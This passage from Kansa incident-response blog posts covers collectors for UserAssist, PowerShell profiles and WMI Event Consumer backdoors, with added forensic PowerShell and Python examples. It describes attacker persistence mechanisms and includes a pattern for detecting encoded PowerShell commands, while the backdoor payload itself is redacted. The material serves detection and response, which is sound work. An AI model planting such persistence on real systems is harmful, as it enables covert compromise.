As you can see, being able to pass command line arguments to collectors is a big benefit. Just be mindful that they are positional, not named, parameters; as a result, if you want to accept all the default arguments but the last one, you still have to specify every argument, supplying the default values for every argument except the one you want to modify.</div>
</span><br />
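As an added example (not the Kansa module itself), the Python below parses a Modules.conf line into its positional, comma-separated arguments and performs the same kind of search Get-FilesByHash.ps1 does: walk a path, keep only files whose names match the extension regex and whose size falls within a range, hash those, and report matches. The sample tree is built in a temporary directory with made-up file names; the extension regex default is the one from the post, while the argument order after the path and the size defaults are assumptions, since the post does not state them.

```python
import hashlib
import os
import re
import tempfile

DEFAULT_EXT_REGEX = r"\.(dll|exe|ps1|sys)$"   # default regex quoted in the post


def parse_module_line(line: str):
    """Split a Modules.conf entry into (module path, positional args). Args are
    comma-separated and unquoted, e.g. 'Disk\\Get-FilesByHash.ps1 <HASH>,MD5,C:\\Windows'.
    Returns None for blank lines and '#' comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    module, _, argstr = line.partition(" ")
    args = [a.strip() for a in argstr.split(",")] if argstr.strip() else []
    return module, args


def file_digest(path: str, hash_type: str) -> str:
    """Hex digest of a file, read in 1 MiB chunks so large files do not load whole."""
    h = hashlib.new(hash_type.lower())
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest().upper()


def find_files_by_hash(file_hash: str, hash_type: str = "MD5", root: str = ".",
                       ext_regex: str = DEFAULT_EXT_REGEX, min_size: int = 0,
                       max_size: int = None):
    """Paths under root whose name matches ext_regex, whose size lies within
    [min_size, max_size] bytes, and whose digest equals file_hash. Name and size
    filters run first so only a fraction of the tree is ever hashed."""
    pattern = re.compile(ext_regex, re.IGNORECASE)
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not pattern.search(name):
                continue
            full = os.path.join(dirpath, name)
            size = os.path.getsize(full)
            if size < min_size or (max_size is not None and size > max_size):
                continue
            if file_digest(full, hash_type) == file_hash.upper():
                hits.append(full)
    return sorted(hits)


def run_demo() -> dict:
    """Build a constructed tree in a temp dir and run three searches for the
    MD5 of b'abc' (900150983CD24FB0D6963F7D28E17F72, the RFC 1321 test vector).
    Returns sorted base names so the result does not depend on the temp path."""
    needle = b"abc"
    target = "900150983CD24FB0D6963F7D28E17F72"
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "sub"))
        files = {"clean.exe": needle, os.path.join("sub", "copy.exe"): needle,
                 "notes.txt": needle, "helper.dll": needle, "other.exe": b"xyz"}
        for rel, content in files.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(content)
        names = lambda paths: sorted(os.path.basename(p) for p in paths)
        return {
            "exe_only": names(find_files_by_hash(target, "MD5", root, r"\.exe$")),
            "default_regex": names(find_files_by_hash(target, "MD5", root)),
            "too_small": names(find_files_by_hash(target, "MD5", root, min_size=100)),
        }


if __name__ == "__main__":
    print(parse_module_line(r"Disk\Get-FilesByHash.ps1 <HASH>,MD5,C:\Windows\System32"))
    print(run_demo())
```

notes.txt has the same content as the matches but never gets hashed because its name fails the regex, which is the saving the post describes; the min_size run shows the size arguments filtering before hashing as well.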
You can find more information about Kansa and the latest release at <a href="https://github.com/davehull/Kansa/releases">https://github.com/davehull/Kansa/releases</a>.
<h3 style="text-align: left;">Kansa: Automating Analysis</h3>
Posted by davehull, 2014-07-04.<br />
<a href="https://github.com/davehull/Kansa" target="_blank">Kansa</a>, the PowerShell-based incident response framework, was written from the start to automate acquisition of data from thousands of hosts, but a mountain of collected data is not worth bits without analysis; thus analysis has been part of the framework from almost the beginning, as may be seen in this <a href="https://github.com/davehull/Kansa/commit/2f5beb44e508b158b666881cd88d66e0af5a6e0e#diff-739e6d2a73723ec7b1919fa5a51f9b07" target="_blank">commit from 2014-04-18</a>.<br />
<br />
Data collection has been configurable via the Modules.conf text file since the beginning and the project has been packaged with a default Modules.conf file with the order of volatility applied. Users could edit the file, comment and uncomment lines to disable and enable modules, customizing data collection. <br />
<br />
After Kansa completed its collection, users could cd into the newly created output directory and then into the specific module directory and run the analysis script of their choosing to derive some intelligence from the collected data. For example, a user might run Kansa's Get-Autorunsc.ps1 collector to gather Autoruns data from a hundred hosts that should have identical or very similar configurations.<br />
<br />
Following the data collection, they could cd into the new output directory's Autorunsc subdirectory, then run<br />
<br />
<code>Get-ASEPImagePathLaunchStringMD5Stack.ps1</code><br />
<br />
which would return a listing of Autoruns aggregated by path to executable, command line arguments and MD5 hash of the executable or script all in ascending order, so any outliers would be at the top of the list and these entries may warrant further investigation.<br />
<br />
This was all well and good, but with more than 30 analysis scripts, analysis of the collected data was becoming cumbersome. It was begging for automation. So, I added it.<br />
<br />
There is now an Analysis.conf file in the Analysis folder that works in much the same way as the Modules\Modules.conf configuration file. Every analysis script has an entry in the configuration file and you can edit the file and comment out the scripts you don't want to run or uncomment the ones you want to run. Then when you run Kansa, simply add the -Analysis flag and after all the data is collected, Kansa will run each analysis script for you and save the output to a new folder under the time stamped output folder called AnalysisReports.<br />
<br />
Below is a sample listing:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxzMWiT4zuAfX2peNgOPCVI7cRmb1MrGUZHGZow0i_kGIOJWBtRjV-CMPMEgMh3WyeiFduzhTxovn0CSGLEiDBk33sxchyphenhyphenjtu1vVEjrM6Ri40vma9SWo_gEvCAitKGbc-loCm4ULTYnbU/s1600/AnalysisOutput.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxzMWiT4zuAfX2peNgOPCVI7cRmb1MrGUZHGZow0i_kGIOJWBtRjV-CMPMEgMh3WyeiFduzhTxovn0CSGLEiDBk33sxchyphenhyphenjtu1vVEjrM6Ri40vma9SWo_gEvCAitKGbc-loCm4ULTYnbU/s1600/AnalysisOutput.png" height="456" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for original size image</td></tr>
</tbody></table>
In the top directory listing of the output directory, you can see the normal output file structure, one folder per module; this was obviously a very limited data collection, with only the Autorunsc, File, Netstat and PrefetchListing modules being used. Error.Log contains information about errors encountered during runtime. What's new here is the AnalysisReports directory.<br />
<br />
The bottom directory listing shows the contents of the AnalysisReports path. Each of these is a TSV file containing summary data derived from the collected data, with the file name reflecting the script that produced it. And the beauty of this is that it's fully automated when you run Kansa with the -Analysis flag and you've configured the Analysis\Analysis.conf file.<br />
<br />
I've made some other improvements to Kansa in the last couple of weeks, but I'll save those for the next post. For now, I wanted to share the automated analysis piece. I'm pretty psyched about it because it's a big time-saver and it puts Kansa in a position where it can easily produce alerts based on the presence of a quality or quantity that an analysis script is written to trigger on.<br />
<br />
<h2>
Kansa: Get-LogUserAssist.ps1</h2>
Posted by davehull, 2014-06-17 (updated 2014-06-23)<br />
<br />
Tonight I pushed the latest collector to Kansa, <a href="https://github.com/davehull/Kansa/blob/master/Modules/Log/Get-LogUserAssist.ps1" target="_blank">Get-LogUserAssist.ps1</a>. This is probably the most complicated collector I've written for Kansa. It has several moving parts and there were some obstacles to overcome.<br />
<br />
As with most Kansa modules, you can run it stand-alone on your localhost, or through Kansa to collect data from thousands of hosts via Windows Remote Management. To run it against your local system, download it from the above link and unblock it, either through Explorer (browse to the file, right-click it and use the Unblock option under Properties; I don't GUI enough to be more precise), or by opening a Powershell prompt in the location where you've downloaded it and running:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">ls Get-LogUserAssist.ps1 | unblock-file</span><br />
<br />
The above may assume you have PS v3; I'm not sure when Unblock-File came into being. You should upgrade to PS v3 if you haven't already, as it has more whizbang.<br />
<br />
Another option is to use Sysinternals <span style="font-family: "Courier New", Courier, monospace;">streams.exe -d Get-LogUserAssist.ps1</span>, but I digress.<br />
<br />
Here's an example of me running this locally on my laptop:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQDf9j-0RF6Eof4hNf_GspLnebtVOuqh3s9va3qvc4WTuU1CcCJf3Xus66akUxT_aiJC8yUkZSrJcr5QX3cIbYfjFas88s9Fm5vnYDy70kp-dXUYhepEIyaSSQxtFUFWl4-C-FRpxalpo/s1600/localrun.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQDf9j-0RF6Eof4hNf_GspLnebtVOuqh3s9va3qvc4WTuU1CcCJf3Xus66akUxT_aiJC8yUkZSrJcr5QX3cIbYfjFas88s9Fm5vnYDy70kp-dXUYhepEIyaSSQxtFUFWl4-C-FRpxalpo/s1600/localrun.PNG" height="283" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for larger image</td></tr>
</tbody></table>
When run locally, the script returns Powershell objects. The output directive for this script tells Kansa to save the output as tab separated values, making for easy import into a database or quick analysis with Logparser. An analysis script for this output is on the <a href="https://github.com/davehull/Kansa/issues?direction=asc&sort=created&state=open" target="_blank">Kansa issues list</a> as an enhancement.<br />
<br />
If you run this locally and want to massage the output to TSV, at your Powershell prompt, you could do:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">PS> .\Get-LogUserAssist.ps1 | ConvertTo-CSV -Delimiter "`t" -NoTypeInformation</span><br />
<br />
I don't care for quoted TSV, so I'd go a step further adding:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">| % { $_ -replace "`"" }</span><br />
<br />
to the above. And why not write it out to a file that you can load into Excel or a database, or query with Logparser? To do that, simply append the following to the pipeline:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">| Set-Content LocalhostUserAssist.tsv</span><br />
<br />
But you don't have to do TSV. You could drop the -Delimiter arg above and default to CSV or instead of using ConvertTo-CSV, use Export-CliXML and you've got XML output for those of you who want a more challenging and slower analysis experience. Zing!<br />
<br />
One thing I'm not clear on and may have to research, is why so many of my "counts" are coming up as zero. Did Windows 8 stop incrementing run counts?<br />
<br />
This collector starts by enumerating all of the local profiles on the target, then looks in each profile path for an ntuser.dat file. If it finds one, it will try to load that hive. If the hive loads, the script looks for UserAssist and parses it, if found. If UserAssist is not found, it moves on to the next user. If the script was unable to load the hive, it assumes that's because the user is currently logged on and the file is locked, so at that point it looks in HKEY_USERS for all the loaded hives by SID, resolves those SIDs to usernames and compares them to the username associated with the locked profile. When it finds a match, it looks for UserAssist in the matching HKEY_USERS key by SID. One thing that occurs to me now, based on something I heard <a href="https://twitter.com/forensic_matt" target="_blank">@forensic_matt</a> say at this year's <a href="http://www.sans.org/event/dfir-summit-2014" target="_blank">SANS DFIR Summit</a>, is that if the user's account is renamed, this match will likely fail. Something to add to the Kansa issues list. Save for that edge case, this script will pull UserAssist key data for all user accounts on a running system.<br />
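As an added example, not the Kansa module's own code, here is one way to carry out the steps just described. It differs from the module in that it maps each profile to its SID through the ProfileList key and resolves the SID to the current account name, so a renamed account still matches its profile path; the temporary hive key name, the function names, and the Windows 7 and later UserAssist value layout (ROT13 value names, run count at offset 4, last run FILETIME at offset 60) are assumptions of this example. It must be run elevated.<br />

```powershell
# Added example, not the Kansa module's code. Assumptions: ProfileList maps
# SID to profile path; UserAssist value names are ROT13; on Windows 7 and
# later the binary value holds the run count at offset 4 and the last run
# FILETIME at offset 60. Run elevated.
function ConvertFrom-Rot13 {
    param([string]$Text)
    $chars = $Text.ToCharArray() | ForEach-Object {
        $c = [int]$_
        if ($c -ge 65 -and $c -le 90)      { [char](($c - 65 + 13) % 26 + 65) }
        elseif ($c -ge 97 -and $c -le 122) { [char](($c - 97 + 13) % 26 + 97) }
        else                               { $_ }
    }
    -join $chars
}

function Read-UserAssistKey {
    param([string]$HivePath, [string]$User, [string]$ProfilePath)
    $base = "$HivePath\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist"
    if (-not (Test-Path $base)) { return }
    Get-ChildItem $base | ForEach-Object {
        $countKey = $_.PSPath + '\Count'
        if (-not (Test-Path $countKey)) { return }
        $item = Get-Item $countKey
        foreach ($name in $item.GetValueNames()) {
            $raw = $item.GetValue($name)
            if ($raw -isnot [byte[]]) { continue }
            $runCount = $null; $lastRun = $null
            if ($raw.Length -ge 68) {
                $runCount = [BitConverter]::ToUInt32($raw, 4)
                $ft = [BitConverter]::ToInt64($raw, 60)
                if ($ft -gt 0) { $lastRun = [DateTime]::FromFileTimeUtc($ft) }
            }
            [PSCustomObject]@{
                User        = $User
                ProfilePath = $ProfilePath
                Name        = ConvertFrom-Rot13 $name
                RunCount    = $runCount
                LastRunUtc  = $lastRun
            }
        }
    }
}

function Get-UserAssistAllProfiles {
    $profileList = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList'
    foreach ($p in Get-ChildItem $profileList) {
        $sid = $p.PSChildName
        # Only domain/local user SIDs; skips service SIDs and .bak entries
        if ($sid -notmatch '^S-1-5-21-[\d-]+$') { continue }
        $profilePath = [Environment]::ExpandEnvironmentVariables((Get-ItemProperty $p.PSPath).ProfileImagePath)
        # Resolve the SID to its current account name; survives account renames
        try {
            $user = ([Security.Principal.SecurityIdentifier]$sid).Translate([Security.Principal.NTAccount]).Value
        } catch { $user = $sid }

        $hku = "Registry::HKEY_USERS\$sid"
        if (Test-Path $hku) {
            # Hive already loaded (user logged on): read it in place
            Read-UserAssistKey -HivePath $hku -User $user -ProfilePath $profilePath
            continue
        }
        $ntuser = Join-Path $profilePath 'NTUSER.DAT'
        if (-not (Test-Path $ntuser)) { continue }
        # Temporary key name is this example's choice
        $tmpName = "UserAssistTmp_$sid"
        & reg.exe load "HKU\$tmpName" $ntuser | Out-Null
        if ($LASTEXITCODE -ne 0) { Write-Warning "Could not load $ntuser"; continue }
        try {
            Read-UserAssistKey -HivePath "Registry::HKEY_USERS\$tmpName" -User $user -ProfilePath $profilePath
        } finally {
            [GC]::Collect()   # release provider handles so the hive can be unloaded
            & reg.exe unload "HKU\$tmpName" | Out-Null
        }
    }
}

Get-UserAssistAllProfiles | Sort-Object LastRunUtc -Descending | Format-Table -AutoSize
```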
<br />
And since it's a Kansa module, you can run it across thousands of hosts easily.<br />
<br />
I hope someone finds it useful.<br />
<br />
[Update] You may be wondering, "Why is this module under Modules\Log, the Registry is not a log file?"<br />
<br />
As Harlan Carvey has rightly pointed out, the Registry sometimes is a log file, and in the case of UserAssist it most certainly is. Hence, I placed it under Modules\Log. You're free to move it elsewhere in your own setup.<br />
<br />
[Update 20140623] Confirmed: for renamed accounts the module was not able to resolve a loaded SID to an account name, but I've fixed this bug. The script now returns the user account name and the user profile path, so spotting renamed accounts is simple. Here's an example where the local Administrator account has been renamed to Gomer.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZQUdBK0xxBs2SUOaLN_wlT6JzWjRAbi3ikkjjui4PYV6JruWCObEA0E9Ogp-uEhx41DlBxGFACvf-0JEs0Jj5FwSD4loCbq2u0bu6-Yis5vqa1tB5A_nLOHYczKmfMleprFbmoCepq8Q/s1600/renamedacct.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZQUdBK0xxBs2SUOaLN_wlT6JzWjRAbi3ikkjjui4PYV6JruWCObEA0E9Ogp-uEhx41DlBxGFACvf-0JEs0Jj5FwSD4loCbq2u0bu6-Yis5vqa1tB5A_nLOHYczKmfMleprFbmoCepq8Q/s1600/renamedacct.PNG" height="62" width="400" /></a></div>
<h2>
Kansa: Powershell profiles potentially hazardous</h2>
Posted by davehull, 2014-05-17 (updated 2014-05-18)<br />
<br />
On the very day I published my previous post, <a href="http://trustedsignal.blogspot.com/2014/05/kansa-collecting-wmi-event-consumer.html" target="_blank">Kansa: Collecting WMI Event Consumer backdoors</a>, Mark Russinovich <a href="https://twitter.com/markrussinovich/status/466324363965632513" target="_blank">announced the release of a new version of Autoruns that collects WMI related ASEPs</a>. I had a chance to play around with it on a machine with a WMI Event Consumer, Event Filter and Filter-to-Consumer Binding configured and indeed, Autoruns now picks up the Event Consumers. I still recommend using Kansa's Get-WMIEvtFilter.ps1 and Get-WMIFltConBind.ps1 collector modules to grab the other two essential pieces that make Event Consumer backdoors possible. The Event Filter is the piece that will tell you what triggers the Event Consumer.<br />
<br />
In this post I want to cover another "auto start extension point" or ASEP and it happens to be another that is not covered by Autoruns, yet. It also happens to be specific to Powershell. <a href="http://technet.microsoft.com/en-us/library/ee692764.aspx" target="_blank">The Windows Powershell Profile</a> is a script that runs, if present, each time a user or SYSTEM opens a Powershell shell. It's akin to a .bash_profile or similar shell profile on *nix systems.<br />
<br />
Adversaries can modify an existing Powershell profile for either a user or the default system profile, planting code enabling them to maintain persistence or perform any task that Powershell is capable of given the context of the script (non-administrator users obviously being less capable than administrators or SYSTEM).<br />
<br />
Kansa's Get-PSProfiles.ps1 collector will enumerate local accounts on remote systems and check each of them for Powershell profiles. Where Powershell profiles exist, Get-PSProfiles will collect them all in a zip file (it will also check for and collect the default Powershell profile). The zip file will then be sent back to the host where Kansa was run.<br />
<br />
Powershell profiles can be located in a few different locations. For user profiles, they are in:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">$env:userprofile\Documents\WindowsPowershell\Microsoft.Powershell_profile.ps1</span><br />
<br />
And the default system profile is in:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">$env:windir\System32\WindowsPowershell\v1.0\Microsoft.Powershell_profile.ps1</span><br />
User Powershell profiles on XP systems are in a slightly different path and Kansa will not acquire them.<br />
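As an added example (not Kansa's Get-PSProfiles.ps1), the following enumerates every profile script location PowerShell honours and reports the ones present with size, last write time and SHA256, so the result can be stacked across hosts. It goes beyond the two paths above: PowerShell checks both profile.ps1 and Microsoft.PowerShell_profile.ps1 in the system directory and in each user's WindowsPowerShell directory, the ISE host has its own file, and on 64-bit Windows the 32-bit PowerShell under SysWOW64 has a separate system directory; using Win32_UserProfile for profile paths and the function name are this example's choices.<br />

```powershell
# Added example, not Kansa's Get-PSProfiles.ps1. Enumerates the profile script
# locations PowerShell honours (AllUsers and per-user, console and ISE hosts,
# plus the SysWOW64 directory used by 32-bit PowerShell on 64-bit Windows)
# and emits one object per existing profile script, ready for ConvertTo-Csv.
function Get-PSProfileScripts {
    $sha = [Security.Cryptography.SHA256]::Create()
    # File names checked in every directory: the "AllHosts" profile, the console
    # host profile and the ISE host profile
    $hostNames = 'profile.ps1',
                 'Microsoft.PowerShell_profile.ps1',
                 'Microsoft.PowerShellISE_profile.ps1'

    $dirs = @()
    # System-wide locations; the SysWOW64 copy is $PSHOME for 32-bit PowerShell
    foreach ($sys in 'System32', 'SysWOW64') {
        $dirs += [PSCustomObject]@{
            Scope = 'AllUsers'; Owner = 'SYSTEM'
            Dir   = Join-Path $env:windir "$sys\WindowsPowerShell\v1.0"
        }
    }
    # Per-user locations, one per local profile (Win32_UserProfile gives the
    # profile path and SID; this is the example's choice of enumeration)
    foreach ($p in Get-WmiObject Win32_UserProfile) {
        if (-not $p.LocalPath) { continue }
        $dirs += [PSCustomObject]@{
            Scope = 'CurrentUser'; Owner = $p.SID
            Dir   = Join-Path $p.LocalPath 'Documents\WindowsPowerShell'
        }
    }

    foreach ($d in $dirs) {
        foreach ($n in $hostNames) {
            $path = Join-Path $d.Dir $n
            if (-not (Test-Path $path -PathType Leaf)) { continue }
            $bytes = [IO.File]::ReadAllBytes($path)
            $hash  = ([BitConverter]::ToString($sha.ComputeHash($bytes))) -replace '-'
            [PSCustomObject]@{
                ComputerName  = $env:COMPUTERNAME
                Scope         = $d.Scope
                Owner         = $d.Owner
                Path          = $path
                Length        = $bytes.Length
                LastWriteTime = (Get-Item $path).LastWriteTimeUtc
                SHA256        = $hash
            }
        }
    }
}

Get-PSProfileScripts | Format-Table -AutoSize
```

Across many hosts, stacking the output by SHA256 separates the handful of distinct profile scripts that actually need reading from the copies that are identical.<br />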
<br />
Unfortunately, there's no quick way of analyzing the collected profile scripts for malicious capabilities, at least not that I'm aware of. Analysts will have to spend time reviewing profiles for suspect code. This is a good time to mention that any ASEP script, not just Powershell profiles, could be modified by adversaries to perform nefarious actions.<br />
<br />
This is another painful reminder of the asymmetry of information security. Adversaries have many places to hide malicious bits and may only need one (or none, if they have a big enough key ring of credentials). Incident responders, depending on the nature of the incident, may have to review every known ASEP.<br />
<br />
Enjoy the code review and happy hunting!<br />
<br />
<h2>
Kansa: Collecting WMI Event Consumer backdoors</h2>
Posted by davehull, 2014-05-13 (updated 2014-05-17)<br />
<br />
In my previous post, <a href="http://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html" target="_blank">Kansa: Service related collectors and analysis</a>, I discussed the Windows Service related collectors and analysis capabilities in Kansa and noted that some of the collected data is not currently collected by Sysinternals' Autoruns.<br />
<br />
Today I'll cover another persistence mechanism that Kansa collects, which is not currently collected by Autoruns; namely <a href="http://msdn.microsoft.com/en-us/library/aa392396(v=vs.85).aspx" target="_blank">WMI Event Consumers</a>. That link tells us "Event consumers are applications or scripts that request notification of events, and then perform tasks when specific events occur."<br />
<br />
[Update: 2014-05-13] Mark Russinovich released a new version of Autoruns today that reports WMI information. I have not tested it yet. It will be interesting to see if it only reports data from Event Consumers and not the Event Filter, which tells what the trigger is.<br />
<br />
For an event consumer to work, three elements are required:<br />
<ul>
<li>An Event Consumer -- this is the piece that performs some action</li>
<li>An Event Filter -- an event query watching for defined activity -- this triggers the consumer</li>
<li>A Filter-to-Consumer Binding -- this links the filter to the consumer</li>
</ul>
In my experience, WMI Event Consumers are not commonly used. So in many situations collecting the data and simply reviewing file sizes can tell you if something is worth investigating further. For example, I recently collected event consumer data from a few thousand hosts. Running the following Powershell command was enough to find which host contained a backdoor running from an event consumer:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">ls *wmievtconsmr.xml | sort length -Descending | more</span><br />
<br />
The output of that command follows, see if you can determine which host had the backdoor installed:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOdjFIyQPqc_8CbnFAAMMxwqwaTgaIAYWjidshMMJH7-mexFarxLaBrgsjmoCXPOxB9bEBKBtJG677FuU-l2EH33J1RCjFe1RHN5zrNuMCkVVcr22bgN9B5NF7vjzAn9phUup3W0VxyVY/s1600/FileSize2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOdjFIyQPqc_8CbnFAAMMxwqwaTgaIAYWjidshMMJH7-mexFarxLaBrgsjmoCXPOxB9bEBKBtJG677FuU-l2EH33J1RCjFe1RHN5zrNuMCkVVcr22bgN9B5NF7vjzAn9phUup3W0VxyVY/s1600/FileSize2.PNG" height="253" width="320" /></a></div>
If you guessed DFWBOSSWEE01, congratulations, you may have the skills necessary to find WMI Event Consumer backdoors.<br />
<br />
So what's in this file? Since it was collected with Kansa's Get-WMIEvtConsumer collector, which specifies its output should be written to an XML file, we can either open the XML file in a suitable editor or use the Powershell cmdlet Import-Clixml to read the file into a variable and examine the contents via the following commands:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">$data = Import-Clixml .\DFWBOSSWEE01_wmievtconsmr.xml</span><br />
<span style="font-family: "Courier New", Courier, monospace;">$data | more</span><br />
<br />
This command returns output like the following:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaigvpdPKMndmqcXQRHior2_MQzCw0kJ85iCvaCqAT-h04m8W2mJHEkop_pOcCiB69K3uFNFZHINbz3BJb9xBIsEUzgW1eYuPPWbsbj9XEJsBm3l21PHm_B1nPwMKbMeKL1Mze505vr0w/s1600/wmibackdoor2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaigvpdPKMndmqcXQRHior2_MQzCw0kJ85iCvaCqAT-h04m8W2mJHEkop_pOcCiB69K3uFNFZHINbz3BJb9xBIsEUzgW1eYuPPWbsbj9XEJsBm3l21PHm_B1nPwMKbMeKL1Mze505vr0w/s1600/wmibackdoor2.png" height="640" width="500" /></a></div>
The most interesting bits above are those in the "CommandLineTemplate" property, which I've redacted a bit, but you can see there's a call to Powershell.exe and a long Base64-encoded string, which in this case was a Powershell encoded command, in essence, a script. Since -EncodedCommand carries the UTF-16LE bytes of the script in Base64, we can decode that script via<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("&lt;encoded string&gt;"))</span><br />
<br />
Doing so would reveal that when this WMI Event Consumer is triggered, it connects to a remote site and downloads another script and runs it.<br />
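As an added example, not Kansa's own collector or analysis code, the following ties the three pieces together on a live host: it joins each Filter-to-Consumer Binding to its Event Filter and Event Consumer and decodes any -EncodedCommand found in a consumer's command line, so the trigger query and the decoded script can be reviewed side by side. The function name, the regular expression and the reference-trimming logic are assumptions of this example.<br />

```powershell
# Added example, not Kansa's code. Joins __FilterToConsumerBinding to
# __EventFilter and __EventConsumer in root\subscription and decodes a
# PowerShell -EncodedCommand (Base64 of UTF-16LE) if one is present.
function Get-WmiSubscriptionSummary {
    $ns = 'root\subscription'
    $filters = @{}; $consumers = @{}
    foreach ($f in Get-WmiObject -Namespace $ns -Class __EventFilter)   { $filters[$f.__RELPATH]   = $f }
    foreach ($c in Get-WmiObject -Namespace $ns -Class __EventConsumer) { $consumers[$c.__RELPATH] = $c }

    foreach ($b in Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding) {
        # Binding references look like __EventFilter.Name="x", sometimes with a
        # \\server\namespace: prefix; strip the prefix to match on __RELPATH
        $fKey = $b.Filter   -replace '^.*?:', ''
        $cKey = $b.Consumer -replace '^.*?:', ''
        $f = $filters[$fKey]
        $c = $consumers[$cKey]

        # The launch payload lives in a different property per consumer class
        $cmd = $null; $decoded = $null; $cClass = 'MISSING'
        if ($c) {
            $cClass = $c.__CLASS
            if ($c.CommandLineTemplate) { $cmd = $c.CommandLineTemplate }
            elseif ($c.ScriptText)      { $cmd = $c.ScriptText }
            else                        { $cmd = $c.ExecutablePath }
            # Any -e/-enc/-encodedcommand prefix followed by a long Base64 run
            if ($cmd -match '(?i)-e[a-z]*\s+([A-Za-z0-9+/=]{20,})') {
                try { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
                catch { $decoded = '<not valid Base64>' }
            }
        }
        $query = if ($f) { $f.Query } else { 'MISSING' }

        [PSCustomObject]@{
            ComputerName   = $env:COMPUTERNAME
            Consumer       = $cKey
            ConsumerClass  = $cClass
            Filter         = $fKey
            FilterQuery    = $query
            Command        = $cmd
            DecodedCommand = $decoded
        }
    }
}

Get-WmiSubscriptionSummary | Format-List
```

Exported with ConvertTo-CSV as shown earlier, FilterQuery and Command stack well across hosts, and a binding whose filter or consumer is reported as MISSING is itself worth a look.<br />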
<br />
So how often is it triggered? What triggers it? To answer those questions, you'll have to review the data Kansa collected via Get-WMIEvtFilter.ps1. A consumer by itself is harmless, but if there's an Event Filter and a Filter-to-Consumer binding, then you've got all the ingredients needed for a WMI Event Consumer based backdoor.<br />
<br />
<h2>
Kansa: Service related collectors and analysis</h2>
Posted by davehull, 2014-05-03<br />
<br />
In my previous post on <a href="http://trustedsignal.blogspot.com/2014/04/kansa-autoruns-data-and-analysis.html" target="_blank">Kansa's Autoruns collectors and analysis scripts</a>, I mentioned that the Get-Autorunsc.ps1 collector relies on Sysinternals' Autorunsc.exe to collect data on all of the Autostart Extension Points (ASEPs) that it has catalogued. Autorunsc and its GUI sibling, Autoruns, are great tools, but they are not comprehensive; there are other ASEPs that they don't catch, so Kansa includes a few additional modules that aim to collect additional ASEPs and additional data about ASEPs.<br />
<br />
<strong>Get-SvcAll.ps1</strong><br />
Runs Get-WMIObject win32_service to collect details about all services. Output is saved as XML. Some of this same data is collected by Get-Autorunsc.ps1 above, however, this will pull additional properties for each service with some of them being specific to the type of service. If a service is running, you'll get its <strong>process id</strong> and the <strong>context it runs under (Local System, Local Service, etc.)</strong>. There's even an <strong>InstallDate</strong> property, which is awesome, however, in my experience, it's never populated, which sucks.<br />
<br />
For analysis of the data collected by Get-SvcAll.ps1, there are two very basic frequency analysis or stacking scripts as of this writing. They are Get-SvcAllStack.ps1 and Get-SvcStartNameStack.ps1. The former does its frequency analysis based on Service "<strong>Captions</strong>" and <strong>Pathnames</strong>. The Captions are the short friendly names you see when you look at the Services running on your system while the <strong>Pathnames include the path to the binary and any arguments</strong>. Here's an example from two systems where the Application Identity service has two different sets of command line arguments:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
